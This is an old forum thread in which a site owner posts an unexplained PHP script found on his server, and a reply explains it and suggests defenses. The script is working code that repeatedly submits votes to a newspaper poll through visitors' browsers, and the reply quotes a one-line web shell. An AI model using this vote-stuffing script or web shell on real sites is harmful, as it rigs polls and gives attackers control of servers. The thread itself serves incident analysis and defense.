I found this wierd script on my site...

Forum Moderators: coopster

Message Too Old, No Replies

I found this wierd script on my site...

...and I didn't place it there

Hard_Target

12:55 pm on Dec 12, 2004 (gmt 0)

I was just looking through my logs and found that the php page "fun.php" page (see code below) has the highest number of visits in December. I have never created or uploaded it!
Any idea what it does (well, I can see what it does, but why?), and most importantly, how it got on my site. Is there anything else I can do as a security measure except for changing my password?

<?
$pagename="http://www.example.com/Election/do-election.asp?selector=2143";
require "Snoopy.class.inc";
$snoopy = new Snoopy;
$snoopy->agent = "(compatible; MSIE 4.01; MSN 2.5; AOL 4.0; Windows 98)";
$snoopy->referer = $pagename;
$snoopy->fetch($pagename);
$a=$snoopy->results;

$code=rand();

print "<html><head><meta http-equiv=\"refresh\" content=\"0;URL=fun.php?id=$code\"></head><body>Ага.</body></html>";
?>

[edited by: ergophobe at 3:46 am (utc) on Dec. 13, 2004]
[edit reason] URL exemplified - don't want to boost their page rank too! [/edit]

mincklerstraat

3:49 pm on Dec 12, 2004 (gmt 0)

Yeah, this would be getting that url, which seems to be one which 'votes' in a poll. Somebody's trying to skew the results of a poll on the Kommersant site. The Kommersant is one of the most-respected financial/political newspapers in Russia. It'll be getting lots of hits since whoever opens it gets it refreshed again and again and again.

I'd have a look at this file's 'creation' time, and go back in your server logs and see what files were being accessed, with what parameters, around that time. This will help you see if you were the victim of a cross-site scripting attack, which you probably were. When you find the file called, see if stuff is dynamically included (like, included with a variable -

include $file;

. Then add stuff so this file actually does some kind of check on that variable to see if it's within the proper limits of what should be included. Probably your hacker had it include a file on some other site which will look like

system($_GET['hack']);

, allowing him to write in any directory that the server has write-access to.

Besides this, you can make sure your directories aren't chmodded 777, you can ask your host to turn off url wrappers for remote files on your site, turning off register globals with an .htaccess file might help (but might not). If the script isn't meant to be called directly, but is in your logs, you can 'glue' this to the file calling it by defining a constant, and at the beginning of the file, checking to see if that constant is defined, or dying {or is that

die

ing()}? This will help you live up to your nick (couldn't help the irony, sorry).

Besides battening down your own hatches, by all means write to the Kommersant with the code that the hacker added to your site, to inform them that this particular poll is being massively skewed - could be many votes per second. You also might offer a relevant portion of your server logs if they want them to pursue this issue further to nail the xss weasel. If you discover the hacker used another site to write this script to your site, also inform that site of their security problem.